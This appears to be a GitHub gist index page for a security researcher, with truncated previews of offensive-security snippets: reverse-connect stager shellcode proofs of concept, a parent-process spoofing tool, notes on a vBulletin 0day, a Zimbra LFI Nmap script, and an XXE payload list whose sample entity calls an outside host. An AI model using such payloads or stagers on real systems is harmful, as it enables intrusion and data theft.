Skip to content

Instantly share code, notes, and snippets.

Avatar
🐙
multitasking

John Troon JohnTroony

🐙
multitasking
View GitHub Profile
@JohnTroony
JohnTroony / fix_gef_on_gdb.sh
Created Jun 7, 2020
Install GEF-GDB Plugin with all commands working.
View fix_gef_on_gdb.sh
#!/bin/bash
#######################################################
# Install GEF-GDB Plugin with all commands working #
# John (Troon) Ombagi : @johntroony #
#######################################################
# Install unicorn, capstone (dependency package)
sudo apt update && sudo apt install -y build-essential python3 python3-dev python3-pip gdb libcapstone3 libcapstone-dev cmake
@JohnTroony
JohnTroony / reverse_stager_shellcode.asm
Last active Apr 26, 2021
x86 Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
View reverse_stager_shellcode.asm
; John (Troon) Ombagi
; Twitter/Github : @johntroony
global _start
section .text
_start:
; Create new stack frame
@JohnTroony
JohnTroony / reverse_staged_shellcode.c
Created Nov 25, 2019
Windows Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
View reverse_staged_shellcode.c
#include<stdio.h>
#include<winsock2.h>
//Winsock Library
#pragma comment(lib,"ws2_32.lib")
// John (Troon) Ombagi
// Twitter/Github : @johntroony
int main(int argc, char **argv){
View 2019_vbulletin_0day_info.txt
I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.
As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php
$serverData = array_merge($_GET, $_POST);
if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
$app = $this->application['handler'];
@JohnTroony
JohnTroony / perm_repeat.py
Last active Sep 27, 2019
Permutation of numbers with repeating.
View perm_repeat.py
#!/usr/bin/python
# John (Troon) Ombagi
# jayombagi@gmail.com
# PR(n, k) = n^k ----> Permutation with repetition.
import itertools
import sys
@JohnTroony
JohnTroony / terminator.config
Created Aug 9, 2019
custom config for terminator terminal on Kali Linux
View terminator.config
[global_config]
enabled_plugins = TerminalShot, LaunchpadCodeURLHandler, APTURLHandler, LaunchpadBugURLHandler
[keybindings]
[profiles]
[[default]]
background_darkness = 0.83
background_type = transparent
cursor_color = "#aaaaaa"
show_titlebar = False
scrollback_infinite = True
View process_spoof.c
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View http-vuln-zimbra-lfi.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6.
The vulnerability is a local file inclusion that can retrieve any file from the server.
View escapetest.c
// Compile with -std=c11
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>
#define MAX_STR_LEN 4095